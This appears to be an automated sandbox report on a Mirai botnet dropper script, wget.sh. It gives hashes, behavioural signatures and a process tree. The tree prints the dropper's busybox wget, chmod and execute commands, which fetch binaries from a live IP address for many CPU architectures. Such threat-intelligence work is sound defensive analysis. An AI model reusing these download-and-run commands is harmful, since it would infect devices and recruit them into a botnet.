Analysis
max time kernel: 149s
max time network: 151s
platform: debian-9_mipsel
resource: debian9-mipsel-20240418-en
resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 10/03/2025, 22:22
Static task: static1
Behavioral task behavioral1: sample wget.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample wget.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample wget.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample wget.sh, resource debian9-mipsel-20240418-en
General
Target: wget.sh
Size: 1KB
MD5: fe3891afe068ca6fc86017361dfb753c
SHA1: d631b6a4eaa99085df4260727c2c86dc82cf5428
SHA256: 8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
SHA512: 810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951
Malware Config
Extracted: mirai (BOTNET)
Extracted: mirai (BOTNET)
Extracted: mirai (BOTNET)
Signatures

Mirai family

Contacts a large (105128) amount of remote hosts (1 TTPs)
This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows (1 TTPs)
This may indicate a network scan to discover remotely running services.

File and Directory Permissions Modification (1 TTPs, 12 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  pid  process
  870  busybox
  778  busybox
  874  busybox
  878  busybox
  882  busybox
  749  busybox
  754  busybox
  759  busybox
  765  busybox
  794  busybox
  809  busybox
  865  busybox
Executes dropped EXE (8 IoCs)
  ioc           pid  process
  /tmp/jklarm   750  wget.sh
  /tmp/jklarm5  755  wget.sh
  /tmp/jklarm6  760  wget.sh
  /tmp/jklarm7  767  wget.sh
  /tmp/jklm68k  779  wget.sh
  /tmp/jklmips  795  wget.sh
  /tmp/jklmpsl  811  wget.sh
  /tmp/jklppc   866  wget.sh

Modifies Watchdog functionality (1 TTPs, 2 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                   ioc                  process
  File opened for modification  /dev/watchdog        jklmpsl
  File opened for modification  /dev/misc/watchdog   jklmpsl

Renames itself (1 IoCs)
  pid  process
  811  jklmpsl
Unexpected DNS network traffic destination (20 IoCs)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  description     ioc             count
  Destination IP  51.158.108.203  11
  Destination IP  202.61.197.122  5
  Destination IP  152.53.15.127   2
  Destination IP  194.36.144.87   2

Enumerates active TCP sockets (1 TTPs, 1 IoCs)
Gets active TCP sockets from /proc virtual filesystem.
  description               ioc            process
  File opened for reading   /proc/net/tcp  jklmpsl

Enumerates running processes
Discovers information about currently running processes on the system
Reads process memory (1 TTPs, 35 IoCs)
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
  description: File opened for reading; process: jklmpsl; ioc: /proc/<pid>/maps for each of the following pids:
  855, 870, 878, 879, 835, 843, 853, 859, 838, 841, 861, 873, 839, 871, 837, 866, 867, 874, 862, 877, 881, 833, 836, 846, 852, 869, 883, 845, 847, 849, 850, 857, 860, 876, 851

Changes its process name (1 IoCs)
  description                                                     ioc    pid  process
  Changes the process name, possibly in an attempt to hide itself  exim4  811  jklmpsl

Reads system network configuration (1 TTPs, 1 IoCs)
Uses contents of /proc filesystem to enumerate network settings.
  description               ioc            process
  File opened for reading   /proc/net/tcp  jklmpsl
Reads runtime system information
  description: File opened for reading; process: jklmpsl; ioc grouped by /proc entry:
  /proc/<pid>/cmdline for pids: 843, 839, 855, 838, 849, 879, 871, 876, 853, 862, 835, 850, 859, 877, 883, 837, 846, 866, 852, 857
  /proc/<pid>/comm for pids: 4, 6, 20, 77, 78, 718, 118, 719, 13, 12, 18, 36, 71, 318, 37, 7, 76, 319, 73, 75, 233, 11, 698, 24, 218, 376, 721, 348, 16, 79, 426, 712, 21, 74, 674, 811
  /proc/<pid>/status for pids: 348, 698, 721, 376, 712, 664, 662, 233
System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
  pid  process
  795  jklmips
  797  busybox
  783  busybox

Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
  description                   ioc           process
  File opened for modification  /tmp/jklppc   busybox
  File opened for modification  /tmp/jklarm   busybox
  File opened for modification  /tmp/jklarm5  busybox
  File opened for modification  /tmp/jklarm6  busybox
  File opened for modification  /tmp/jklarm7  busybox
  File opened for modification  /tmp/jklm68k  busybox
  File opened for modification  /tmp/jklmips  busybox
  File opened for modification  /tmp/jklmpsl  busybox
Processes
(tree depth shown by indentation; each entry gives the executable path, the command line, the PID, and any signatures that fired on that process)

/tmp/wget.sh  cmd: /tmp/wget.sh  PID:721
  - Executes dropped EXE
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklarm -O jklarm  PID:723
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklarm  PID:749
    - File and Directory Permissions Modification
  /tmp/jklarm  cmd: ./jklarm telnet  PID:750
  /bin/busybox  cmd: /bin/busybox rm -rf jklarm  PID:752
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5  PID:753
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklarm5  PID:754
    - File and Directory Permissions Modification
  /tmp/jklarm5  cmd: ./jklarm5 telnet  PID:755
  /bin/busybox  cmd: /bin/busybox rm -rf jklarm5  PID:757
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6  PID:758
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklarm6  PID:759
    - File and Directory Permissions Modification
  /tmp/jklarm6  cmd: ./jklarm6 telnet  PID:760
  /bin/busybox  cmd: /bin/busybox rm -rf jklarm6  PID:762
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7  PID:763
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklarm7  PID:765
    - File and Directory Permissions Modification
  /tmp/jklarm7  cmd: ./jklarm7 telnet  PID:767
  /bin/busybox  cmd: /bin/busybox rm -rf jklarm7  PID:769
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k  PID:770
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklm68k  PID:778
    - File and Directory Permissions Modification
  /tmp/jklm68k  cmd: ./jklm68k telnet  PID:779
  /bin/busybox  cmd: /bin/busybox rm -rf jklm68k  PID:782
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklmips -O jklmips  PID:783
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklmips  PID:794
    - File and Directory Permissions Modification
  /tmp/jklmips  cmd: ./jklmips telnet  PID:795
    - System Network Configuration Discovery
  /bin/busybox  cmd: /bin/busybox rm -rf jklmips  PID:797
    - System Network Configuration Discovery
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl  PID:799
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklmpsl  PID:809
    - File and Directory Permissions Modification
  /tmp/jklmpsl  cmd: ./jklmpsl telnet  PID:811
    - Modifies Watchdog functionality
    - Renames itself
    - Enumerates active TCP sockets
    - Reads process memory
    - Changes its process name
    - Reads system network configuration
    - Reads runtime system information
  /bin/busybox  cmd: /bin/busybox rm -rf jklmpsl  PID:814
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklppc -O jklppc  PID:816
    - Writes file to tmp directory
  /bin/busybox  cmd: /bin/busybox chmod +x jklppc  PID:865
    - File and Directory Permissions Modification
  /tmp/jklppc  cmd: ./jklppc telnet  PID:866
  /bin/busybox  cmd: /bin/busybox rm -rf jklppc  PID:868
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4  PID:869
  /bin/busybox  cmd: /bin/busybox chmod +x jklsh4  PID:870
    - File and Directory Permissions Modification
  /tmp/jklsh4  cmd: ./jklsh4 telnet  PID:871
  /bin/busybox  cmd: /bin/busybox rm -rf jklsh4  PID:872
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklspc -O jklspc  PID:873
  /bin/busybox  cmd: /bin/busybox chmod +x jklspc  PID:874
    - File and Directory Permissions Modification
  /tmp/jklspc  cmd: ./jklspc telnet  PID:875
  /bin/busybox  cmd: /bin/busybox rm -rf jklspc  PID:876
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86  PID:877
  /bin/busybox  cmd: /bin/busybox chmod +x jklx86  PID:878
    - File and Directory Permissions Modification
  /tmp/jklx86  cmd: ./jklx86 telnet  PID:879
  /bin/busybox  cmd: /bin/busybox rm -rf jklx86  PID:880
  /bin/busybox  cmd: /bin/busybox wget http://176.65.134.5/jklarc -O jklarc  PID:881
  /bin/busybox  cmd: /bin/busybox chmod +x jklarc  PID:882
    - File and Directory Permissions Modification
  /tmp/jklarc  cmd: ./jklarc telnet  PID:883
  /bin/busybox  cmd: /bin/busybox rm -rf jklarc  PID:884
  /bin/busybox  cmd: /bin/busybox rm -rf wget.sh  PID:885
Network

MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Impair Defenses (1)
Downloads

Filesize: 60KB
MD5: 35c215d8e2b2ea03a8a191fb3723195a
SHA1: c38bcfc3d7050edeff1b7dbffd85d07348bb01e9
SHA256: c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90
SHA512: ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

Filesize: 60KB
MD5: a04040c769cad786555e183ba8ae0ca0
SHA1: a89d6b50a8140dddce29595c64949214e65c84f1
SHA256: 7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3
SHA512: e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

Filesize: 69KB
MD5: 9e18604aa4c5bedd6e9ea6690b751880
SHA1: c1f32fe93aa650f9920fc5bd659d23621ab034a2
SHA256: 41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb
SHA512: cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

Filesize: 82KB
MD5: a9675614a267473cb83e195d9074a067
SHA1: a4d148cf841fc2b84c8bb3dd322e40f601532875
SHA256: fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9
SHA512: 8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28

Filesize: 60KB
MD5: f5fa9a5e6c2a71c86b783b6b5586c3e4
SHA1: 1a7888806663b58f4bee84472dab0b63adfab8ea
SHA256: d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d
SHA512: e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a

Filesize: 78KB
MD5: ce4bd94ea8cbc021bf79e11f1f734c25
SHA1: f562c88119484f3e92be6e95cb0a435836ca6362
SHA256: ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab
SHA512: d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29

Filesize: 79KB
MD5: 9f79f159a672411a7e5b01f1ed3deb4a
SHA1: 98584c58a231322ed3e64b96727fe6d935f30aa4
SHA256: 9cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa
SHA512: 8486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537

Filesize: 59KB
MD5: 2d898ada13cb85e3fc710949c44ade47
SHA1: db36b96c9531eff756b3d2ee92b632bc4903a179
SHA256: 00188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd
SHA512: e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78